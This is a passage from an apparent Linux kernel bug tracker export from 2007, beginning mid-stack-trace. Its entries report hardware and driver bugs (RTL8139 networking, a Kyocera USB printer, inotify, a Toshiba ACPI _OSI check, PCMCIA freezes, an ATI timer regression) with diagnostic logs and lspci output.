[&lt;c02585e1&gt;] _atomic_dec_and_lock+0x31/0x60 [ 117.271346] [&lt;c02322aa&gt;] xfs_buf_iowait+0x2a/0x40 [ 117.285816] [&lt;c023955f&gt;] xfs_mountfs_check_barriers+0xbf/0x110 [ 117.303663] [&lt;c02276fd&gt;] xfs_mount+0x9ad/0x9c0 [ 117.317354] [&lt;c01d2f40&gt;] xfs_qm_parseargs+0x0/0x2b0 [ 117.332369] [&lt;c0226d50&gt;] xfs_mount+0x0/0x9c0 [ 117.345539] [&lt;c0239e92&gt;] vfs_mount+0x22/0x30 [ 117.358711] [&lt;c0239cb8&gt;] xfs_fs_fill_super+0x78/0x1e0 [ 117.374220] [&lt;c025cf0f&gt;] snprintf+0x1f/0x30 [ 117.387130] [&lt;c01a2222&gt;] disk_name+0x92/0xc0 [ 117.400302] [&lt;c0169bd4&gt;] get_sb_bdev+0x104/0x140 [ 117.414512] [&lt;c0238ed0&gt;] xfs_fs_get_sb+0x20/0x30 [ 117.428721] [&lt;c0239c40&gt;] xfs_fs_fill_super+0x0/0x1e0 [ 117.443971] [&lt;c0169696&gt;] vfs_kern_mount+0xb6/0x130 [ 117.458701] [&lt;c0169769&gt;] do_kern_mount+0x39/0x60 [ 117.472912] [&lt;c017ec5c&gt;] do_mount+0x42c/0x700 [ 117.486343] [&lt;c041fd34&gt;] _spin_unlock+0x14/0x20 [ 117.500293] [&lt;c02585c6&gt;] _atomic_dec_and_lock+0x16/0x60 [ 117.516322] [&lt;c02585e1&gt;] _atomic_dec_and_lock+0x31/0x60 [ 117.532353] [&lt;c014c27a&gt;] __get_free_pages+0x1a/0x40 [ 117.547367] [&lt;c017d4d0&gt;] copy_mount_options+0x40/0x150 [ 117.563135] [&lt;c017efa2&gt;] sys_mount+0x72/0xb0 [ 117.576306] [&lt;c0576e9e&gt;] mount_block_root+0x8e/0x270 [ 117.591555] [&lt;c0171d57&gt;] sys_mknod+0x27/0x30 [ 117.604726] [&lt;c05770d0&gt;] mount_root+0x50/0x90 [ 117.618157] [&lt;c0577222&gt;] prepare_namespace+0x112/0x150 [ 117.633925] [&lt;c016658f&gt;] sys_access+0x1f/0x30 [ 117.647356] [&lt;c0576842&gt;] init+0x132/0x1a0 [ 117.659750] [&lt;c0576710&gt;] init+0x0/0x1a0 [ 117.671621] [&lt;c0576710&gt;] init+0x0/0x1a0 [ 117.683492] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 117.700092] ======================= [ 117.710847] ksoftirqd/0 S 00000002 0 2 1 3 (L-TLB) [ 117.734281] dff85fc0 00000086 00000000 00000002 c041d245 005b56e0 00e1f28c dfe1f28c [ 117.759400] 0000000a dff80aa0 8f8690b8 00000007 000007c5 dff80bac c01205eb c01206e6 [ 117.785144] 00000246 fffffffc dff83f00 00000000 c0120bc0 c0120c4c c012f908 ffffffff [ 117.810891] Call Trace: [ 117.818892] [&lt;c041d245&gt;] __sched_text_start+0x255/0x670 [ 117.834921] [&lt;c01205eb&gt;] _local_bh_enable+0x4b/0xe0 [ 117.849910] [&lt;c01206e6&gt;] __do_softirq+0x66/0xa0 [ 117.863860] [&lt;c0120bc0&gt;] ksoftirqd+0x0/0x90 [ 117.876771] [&lt;c0120c4c&gt;] ksoftirqd+0x8c/0x90 [ 117.889942] [&lt;c012f908&gt;] kthread+0xa8/0xe0 [ 117.902594] [&lt;c012f860&gt;] kthread+0x0/0xe0 [ 117.914987] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 117.930754] ======================= [ 117.941510] khelper S DFF8BF9C 0 4 1 5 3 (L-TLB) [ 117.964941] dff8bf80 00000082 c1472678 dff8bf9c 00000046 00000000 00000002 c1472650 [ 117.990088] 00000001 dff89530 da8a8ae5 00000007 00000ad5 dff8963c c1472650 00000286 [ 118.015807] c1472650 c1472620 c1472648 c1472650 dff8bf9c c012cc2c 00000001 00000000 [ 118.041526] Call Trace: [ 118.049503] [&lt;c012cc2c&gt;] worker_thread+0x12c/0x170 [ 118.064232] [&lt;c01185b0&gt;] default_wake_function+0x0/0x10 [ 118.080262] [&lt;c012cb00&gt;] worker_thread+0x0/0x170 [ 118.094471] [&lt;c012f908&gt;] kthread+0xa8/0xe0 [ 118.107122] [&lt;c012f860&gt;] kthread+0x0/0xe0 [ 118.119514] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 118.135282] ======================= [ 118.146037] kthread S DFF8DF9C 0 5 1 63 4 (L-TLB) [ 118.169469] dff8df80 00000082 dffd4198 dff8df9c 00000046 00000000 00000002 dffd4170 [ 118.194590] 0000000a dff88ac0 e03f57e8 00000007 00000b7d dff88bcc dffd4170 00000286 [ 118.220335] dffd4170 dffd4140 dffd4168 dffd4170 dff8df9c c012cc2c 00000001 00000000 [ 118.246054] Call Trace: [ 118.254030] [&lt;c012cc2c&gt;] worker_thread+0x12c/0x170 [ 118.268759] [&lt;c01185b0&gt;] default_wake_function+0x0/0x10 [ 118.284790] [&lt;c012cb00&gt;] worker_thread+0x0/0x170 [ 118.298998] [&lt;c012f908&gt;] kthread+0xa8/0xe0 [ 118.311649] [&lt;c012f860&gt;] kthread+0x0/0xe0 [ 118.324041] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 118.339812] ======================= [ 118.350565] kblockd/0 S C14B1F9C 0 63 5 64 (L-TLB) [ 118.373997] c14b1f80 00000082 dff76498 c14b1f9c 00000046 00000000 00000002 dff76470 [ 118.399145] 00000001 c149e030 0822f614 00000006 000009b2 c149e13c dff76470 00000286 [ 118.424864] dff76470 dff76440 dff76468 dff76470 c14b1f9c c012cc2c 00000001 00000000 [ 118.450583] Call Trace: [ 118.458584] [&lt;c012cc2c&gt;] worker_thread+0x12c/0x170 [ 118.473313] [&lt;c01185b0&gt;] default_wake_function+0x0/0x10 [ 118.489342] [&lt;c012cb00&gt;] worker_thread+0x0/0x170 [ 118.503553] [&lt;c012f908&gt;] kthread+0xa8/0xe0 [ 118.516204] [&lt;c012f860&gt;] kthread+0x0/0xe0 [ 118.528596] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 118.544364] ======================= [ 118.555119] kacpid S C14B5F9C 0 64 5 129 63 (L-TLB) [ 118.578551] c14b5f80 00000082 dff76298 c14b5f9c 00000046 00000000 0a4ade29 00000006 [ 118.603700] 00000001 c14b3530 0a4aeddd 00000006 00001130 c14b363c 000006a1 00000000 [ 118.629442] dff76270 dff76240 dff76268 dff76270 c14b5f9c c012cc2c 00000001 00000000 [ 118.655188] Call Trace: [ 118.663164] [&lt;c012cc2c&gt;] worker_thread+0x12c/0x170 [ 118.677894] [&lt;c01185b0&gt;] default_wake_function+0x0/0x10 [ 118.693922] [&lt;c012cb00&gt;] worker_thread+0x0/0x170 [ 118.708133] [&lt;c012f908&gt;] kthread+0xa8/0xe0 [ 118.720784] [&lt;c012f860&gt;] kthread+0x0/0xe0 [ 118.733176] [&lt;c0104c2f&gt;] kernel_thread_helper+0x7/0x18 [ 118.748944] ======================= [ 118.759699] ata/0 S DFF05F9C 0 129 5 130 64 (L-TLB) [ 118.783133] dff05f80 00000082 dffc01b8 dff05f9c 00000046 00000000 00000002 dffc0190 [ 118.808251] 0000000a dfe09510 0c64ae53 00000007 00004bfc dfe0961c dffc0190 00000286 [ 118.833971] dffc0190 dffc0160 dffc0188 dffc0190 dff05f9c c012cc2c 000</t>
  </si>
  <si>
    <t>Network device stops working after a few minutes</t>
  </si>
  <si>
    <t>2007-01-06 05:54 UTC</t>
  </si>
  <si>
    <t>Matt Keenan</t>
  </si>
  <si>
    <t>2007-01-26 12:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19 Distribution: Debian (sid) Hardware Environment: VIA KM400A chipset, onboard RTL8139 (RTL-8100B/8139D) - lspci attached Software Environment: Problem Description: The onboard network device stops working after about 2000 or so interrupts, a soft reboot won't fix the problem even onto a working kernel. A full power off reboot is required to get the device to work again (on a working kernel). This might be related to bug 6138 Steps to reproduce: Just boot, do a little network traffic and nothing.. it always seems to stop at approx 2,500 interrupts.. I can't git-bisect on this machine at the moment because it is in production. I may be able to cycle it out in 3-4 weeks if necessary. # lspci -vv 00:00.0 Host bridge: VIA Technologies, Inc. VT8378 [KM400] Chipset Host Bridge Subsystem: Giga-byte Technology GA-7VM400M Motherboard Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 8 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=128M] Capabilities: [80] AGP version 3.5 Status: RQ=32 Iso- ArqSz=0 Cal=2 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 Memory behind bridge: dc000000-ddffffff Prefetchable memory behind bridge: d8000000-dbffffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR+ BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0b.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 10000ns max) Interrupt: pin A routed to IRQ 17 Region 0: Memory at de008000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0b.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Hauppauge computer works Inc. WinTV Series Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1000ns min, 63750ns max) Interrupt: pin A routed to IRQ 17 Region 0: Memory at de004000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0f.0 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 18 Region 4: I/O ports at d000 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 19 Region 4: I/O ports at d400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 19 Region 4: I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at dc00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at e000 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 19 Region 0: Memory at de005000 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [K8T800 South] Subsystem: Giga-byte Technology Unknown device 5001 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60) Subsystem: Giga-byte Technology GA-7VAX Onboard Audio (Realtek ALC650) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 20 Region 0: I/O ports at e400 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:13.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Giga-byte Technology GA-7VM400M Motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at e800 [size=256] Region 1: Memory at de006000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:14.0 FireWire (IEEE 1394): Texas Instruments TSB43AB23 IEEE-1394a-2000 Controller (PHY/Link) (prog-if 10 [OHCI]) Subsystem: Giga-byte Technology Unknown device 1000 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 1000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 6 Region 0: Memory at de007000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at de000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: VIA Technologies, Inc. VT8378 [S3 UniChrome] Integrated Video (rev 01) (prog-if 00 [VGA]) Subsystem: Giga-byte Technology GA-7VM400M Motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min) Interrupt: pin A routed to IRQ 10 Region 0: Memory at d8000000 (32-bit, prefetchable) [size=64M] Region 1: Memory at dc000000 (32-bit, non-prefetchable) [size=16M] [virtual] Expansion ROM at dd000000 [disabled] [size=64K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [70] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt;</t>
  </si>
  <si>
    <t>USB communication with Kyocera FS 820 fails when reading printer ID</t>
  </si>
  <si>
    <t>2.6.19.1, 2.6.18.x, older versions likely</t>
  </si>
  <si>
    <t>2007-01-06 13:02 UTC</t>
  </si>
  <si>
    <t>Martin Williges</t>
  </si>
  <si>
    <t>2007-08-15 01:17 UTC</t>
  </si>
  <si>
    <t>Remark: For this bug there is a patch already in -mm and -grekh trees. This bug report works as a reminder. Most recent kernel where this bug did *NOT* occur: unknown Distribution: gentoo with gentoo-sources / vanilla kernel Hardware Environment: x86 (Athlon XP 2400+), NEC USB Card (1033:0035), Kyocera Mita FS 820 Software Environment: gentoo linux (i686), udev 103, cups 1.2.6 / 1.2.7 Problem Description: since cups 1.2, cups requests the printer ID before adding a printer and before each print job. The Kyocera FS 820 seems to have a problem with ID requests - it does not answer the request unless there has been communication just before (e.g. plugging in) Symptoms: strace output: /usr/libexec/cups/backend # strace -e raw=ioctl /usr/libexec/cups/backend/usb [...] open("/dev/usb/lp0", O_RDWR|O_EXCL|O_LARGEFILE) = 3 ioctl(0x3, 0x84005001, 0xbfc397b1) = -1 (errno 5) close(3) = 0 [...] usbmon log: de8fbac0 2123539163 S Bi:003:02 -115 8192 &lt; ddba3860 2123539196 S Ci:003:00 s a1 00 0000 0000 03ff 1023 &lt; ddba3860 2128538251 C Ci:003:00 -104 0 de8fbac0 2128539243 C Bi:003:02 -2 0 links: lkml: http://lkml.org/lkml/2006/12/22/62 lkml: http://lkml.org/lkml/2006/12/28/163 private homepage: http://www.zut.de/kyocerafs820.html possibly related: http://www.mail-archive.com/linux-usb-devel@lists.sourceforge.net/msg39521.html patch that fixes mentined behaviour: To get the printer working, it can be added to the list of "quirky printers" in usblp.c: --- a/drivers/usb/class/usblp.c +++ b/drivers/usb/class/usblp.c @@ -217,6 +217,7 @@ static const struct quirk_printer_struct quirk_printers[] = {</t>
  </si>
  <si>
    <t>BUG: at fs/inotify.c:172 set_dentry_child_flags()</t>
  </si>
  <si>
    <t>2.6.24</t>
  </si>
  <si>
    <t>2007-01-07 05:29 UTC</t>
  </si>
  <si>
    <t>2008-04-24 11:58 UTC</t>
  </si>
  <si>
    <t>John McCutchan</t>
  </si>
  <si>
    <t>8422 8682</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc3 Distribution: Debian testing Hardware Environment: Acer TravelMate 240 Software Environment: Debian testing Problem Description: Hi, today I got following bug on my 2.6.20-rc3 vanilla kernel's dmesg 2 times: BUG: at fs/inotify.c:172 set_dentry_child_flags() [&lt;c0179b74&gt;] set_dentry_child_flags+0x5e/0x149 [&lt;c0179cb2&gt;] remove_watch_no_event+0x53/0x5f [&lt;c0179da0&gt;] inotify_remove_watch_locked+0x12/0x3e [&lt;c0179ee2&gt;] inotify_rm_wd+0x6c/0x89 [&lt;c017a58a&gt;] sys_inotify_rm_watch+0x38/0x4f [&lt;c0102cc8&gt;] syscall_call+0x7/0xb [&lt;c02d0033&gt;] fib_validate_source+0x1d8/0x22d ======================= BUG: at fs/inotify.c:172 set_dentry_child_flags() [&lt;c0179b74&gt;] set_dentry_child_flags+0x5e/0x149 [&lt;c017a151&gt;] inotify_add_watch+0xb8/0xff [&lt;c017abc4&gt;] sys_inotify_add_watch+0x10b/0x147 [&lt;c0179e59&gt;] put_inotify_watch+0x21/0x3e [&lt;c0179ef7&gt;] inotify_rm_wd+0x81/0x89 [&lt;c0102cc8&gt;] syscall_call+0x7/0xb [&lt;c02d0033&gt;] fib_validate_source+0x1d8/0x22d ======================= Distro Debian testing # uname -a Linux notas 2.6.20-rc3 #3 PREEMPT Thu Jan 4 11:28:04 CET 2007 i686 GNU/Linux Thanks for fixing! Michal Steps to reproduce: not known</t>
  </si>
  <si>
    <t>_OSI "Linux" breaks BIOS - Toshiba Satellite P100 MA5</t>
  </si>
  <si>
    <t>2007-01-07 18:04 UTC</t>
  </si>
  <si>
    <t>Patrick Day</t>
  </si>
  <si>
    <t>2007-07-13 23:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None Distribution: Ubuntu 6.10 Edgy Eft Hardware Environment: Toshiba Satellite P100 MA5 laptop (model PSPA3C MA502C, system BIOS V2.40) Problem Description: Decompiling the DSDT using iasl reveals the following method where OS detection occurs. Method (_INI, 0, NotSerialized) { If (DTSE) { TRAP (0x47) } Store (0x07D0, OSYS) If (CondRefOf (_OSI, Local0)) { If (_OSI ("Linux")) { Store (0x03E8, OSYS) } Else { Store (0x07D1, OSYS) If (_OSI ("Windows 2001 SP2")) { Store (0x07D2, OSYS) } If (_OSI ("Windows 2001.1")) { Store (0x07D3, OSYS) } If (_OSI ("Windows 2001.1 SP1")) { Store (0x07D4, OSYS) } If (_OSI ("Windows 2006")) { Store (0x07D6, OSYS) } If (LAnd (MPEN, LEqual (OSYS, 0x07D1))) { TRAP (0x3D) } } } } There is no further OS ACPI interface checking once the OS confesses to supporting the Linux ACPI interface which causes certain laptop devices to not be enabled (e.g. Intel HDA sound). Disabling the OSI functionality also gives the same result. My complete winding road leading to this bug report can be found at https://launchpad.net/ubuntu/+source/linux-source-2.6.17/+bug/75434</t>
  </si>
  <si>
    <t>System freeze as soon as PCMCIA card is inserted</t>
  </si>
  <si>
    <t>2007-01-08 01:12 UTC</t>
  </si>
  <si>
    <t>Gautam Iyer</t>
  </si>
  <si>
    <t>2009-03-18 09:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 04) 00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04) 00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04) 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 04) 00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 04) 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 04) 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 04) 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 04) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d4) 00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 04) 00:1e.3 Modem: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Modem Controller (rev 04) 00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 04) 00:1f.2 IDE interface: Intel Corporation 82801FBM (ICH6M) SATA Controller (rev 04) 00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 04) 01:03.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 02) 01:07.0 Network controller: Intel Corporation PRO/Wireless 2915ABG Network Connection (rev 05) 01:0a.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 01:0c.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Software Environment: pcmciautils-014 with firmware pcmcia-cs-cis-3.2.8 udev-103 Problem Description: Complete and immediate system freeze. No log or device messages are generated. Steps to reproduce: Load the yenta_socket module, and insert a PCMCIA card into the PC Card slot. (If it makes any difference, I inserted a Sandisk Compact flash to PC Card [16bit] adapter). Nieve thoughts: I read in passing (in a link I can't seem to locate again) that the PNP resources that the kernel assigns to the PC Card are in use by the mother board, and hence the crash. I don't know how to fix this though...</t>
  </si>
  <si>
    <t>2.6.20-rc4</t>
  </si>
  <si>
    <t>2007-01-08 05:14 UTC</t>
  </si>
  <si>
    <t>Timo Jyrinki</t>
  </si>
  <si>
    <t>2007-02-13 12:46 UTC</t>
  </si>
  <si>
    <t>I'm creating a new bug as it was suggested in bug 3927. In 2.6.20, there is a regression on at least my ATI board (and thus probably others) that the clock runs at double speed. The most likely culprit is http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=b026872601976f666bae77b609dc490d1834bf77 I will attach dmesg logs from 2.6.19 and 2.6.20-rc4, plus lspci outputs. Note that the following lines are missing from 2.6.20 dmesg output: [ 0.000000] ATI board detected. Disabling timer routing over 8254. [ 31.368871] ..MP-BIOS bug: 8254 timer not connected to IO-APIC</t>
